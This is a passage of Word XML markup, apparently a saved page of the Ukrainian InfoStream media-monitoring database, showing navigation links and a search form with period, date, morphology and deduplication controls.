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1600" w:type="dxa"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="DFE6EF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="18540"/>
        <w:gridCol w:w="180"/>
        <w:gridCol w:w="2880"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F854A0" w:rsidTr="00F854A0">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="CDCECD"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CDCECD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CDCECD"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CDCECD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DFE6EF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="606EAB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="606EAB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Активна база даних:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="606EAB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="606EAB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>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79.5pt;height:18pt" o:ole="">
                  <v:imagedata r:id="rId6" o:title=""/>
                </v:shape>
                <w:control r:id="rId7" w:name="DefaultOcxName" w:shapeid="_x0000_i1074"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="606EAB"/>
                <w:sz w:val="29"/>
                <w:szCs w:val="29"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="606EAB"/>
                <w:sz w:val="29"/>
                <w:szCs w:val="29"/>
              </w:rPr>
              <w:t>Система інтеграції ресурсів Інтернету</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:color w:val="000000"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>Вхід</w:t>
              </w:r>
            </w:hyperlink>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:color w:val="000000"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>Вихід</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblCellSpacing w:w="0" w:type="dxa"/>
              <w:tblCellMar>
                <w:left w:w="0" w:type="dxa"/>
                <w:right w:w="0" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1932"/>
              <w:gridCol w:w="2844"/>
              <w:gridCol w:w="2133"/>
              <w:gridCol w:w="2843"/>
              <w:gridCol w:w="748"/>
              <w:gridCol w:w="2843"/>
              <w:gridCol w:w="948"/>
              <w:gridCol w:w="2843"/>
              <w:gridCol w:w="1396"/>
            </w:tblGrid>
            <w:tr w:rsidR="00F854A0">
              <w:trPr>
                <w:tblCellSpacing w:w="0" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:hyperlink r:id="rId10" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t>Допомога</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="2"/>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1" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                      </w:rPr>
                      <w:t>Опис InfoStream</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                        <w:vertAlign w:val="superscript"/>
                      </w:rPr>
                      <w:t>®</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="2"/>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2" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                      </w:rPr>
                      <w:t>InfoStream Персональний</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="2"/>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3" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                      </w:rPr>
                      <w:t>Інтерфейс корисутвача</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="2"/>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4" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                      </w:rPr>
                      <w:t>Мова запитів</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="2"/>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rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId15" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                      </w:rPr>
                      <w:t>Приклади запитів</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4114" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:hyperlink r:id="rId16" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t>Кабінет</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="3"/>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7" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                      </w:rPr>
                      <w:t>Персональні канали</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="3"/>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8" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                      </w:rPr>
                      <w:t>Персональні джерела</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="3"/>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rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId19" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:b/>
                        <w:bCs/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                      </w:rPr>
                      <w:t>Статистика</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4114" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId20" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t>Джерела</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4114" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId21" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t>Статистика</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4114" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:noWrap/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="a5"/>
                        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t>Вебсайт проекту</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="CDCECD"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CDCECD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CDCECD"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CDCECD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DFE6EF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId23" w:tooltip="Перейти на главную страницу базы" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                </w:rPr>
                <w:t>InfoStream - система мониторинга СМИ</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:pStyle w:val="z-"/>
      </w:pPr>
      <w:r>
        <w:t>Начало формы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C2CFDF"/>
        <w:spacing w:after="225"/>
        <w:ind w:right="-5310"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1073" type="#_x0000_t75" style="width:53.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId24" o:title=""/>
          </v:shape>
          <w:control r:id="rId25" w:name="DefaultOcxName1" w:shapeid="_x0000_i1073"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">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072" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId26" o:title=""/>
          </v:shape>
          <w:control r:id="rId27" w:name="DefaultOcxName2" w:shapeid="_x0000_i1072"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Посторінково</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">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071" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId28" o:title=""/>
          </v:shape>
          <w:control r:id="rId29" w:name="DefaultOcxName3" w:shapeid="_x0000_i1071"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Морфологія</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">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070" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId28" o:title=""/>
          </v:shape>
          <w:control r:id="rId30" w:name="DefaultOcxName4" w:shapeid="_x0000_i1070"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Вилучити дублі</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C2CFDF"/>
        <w:spacing w:after="225"/>
        <w:ind w:right="-5310"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Період:       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1069" type="#_x0000_t75" style="width:70.5pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId31" o:title=""/>
          </v:shape>
          <w:control r:id="rId32" w:name="DefaultOcxName5" w:shapeid="_x0000_i1069"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C2CFDF"/>
        <w:spacing w:after="225"/>
        <w:ind w:right="-5310"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>От: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1068" type="#_x0000_t75" style="width:60.75pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId33" o:title=""/>
          </v:shape>
          <w:control r:id="rId34" w:name="DefaultOcxName6" w:shapeid="_x0000_i1068"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> До: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1067" type="#_x0000_t75" style="width:60.75pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId35" o:title=""/>
          </v:shape>
          <w:control r:id="rId36" w:name="DefaultOcxName7" w:shapeid="_x0000_i1067"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CDDAE6"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="-5310"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1066" type="#_x0000_t75" style="width:58.5pt;height:18.75pt" o:ole="">
            <v:imagedata r:id="rId37" o:title=""/>
          </v:shape>
          <w:control r:id="rId38" w:name="DefaultOcxName8" w:shapeid="_x0000_i1066"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1065" type="#_x0000_t75" style="width:58.5pt;height:18.75pt" o:ole="">
            <v:imagedata r:id="rId39" o:title=""/>
          </v:shape>
          <w:control r:id="rId40" w:name="DefaultOcxName9" w:shapeid="_x0000_i1065"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1064" type="#_x0000_t75" style="width:58.5pt;height:18.75pt" o:ole="">
            <v:imagedata r:id="rId41" o:title=""/>
          </v:shape>
          <w:control r:id="rId42" w:name="DefaultOcxName10" w:shapeid="_x0000_i1064"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1063" type="#_x0000_t75" style="width:58.5pt;height:18.75pt" o:ole="">
            <v:imagedata r:id="rId43" o:title=""/>
          </v:shape>
          <w:control r:id="rId44" w:name="DefaultOcxName11" w:shapeid="_x0000_i1063"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1062" type="#_x0000_t75" style="width:58.5pt;height:18.75pt" o:ole="">
            <v:imagedata r:id="rId45" o:title=""/>
          </v:shape>
          <w:control r:id="rId46" w:name="DefaultOcxName12" w:shapeid="_x0000_i1062"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
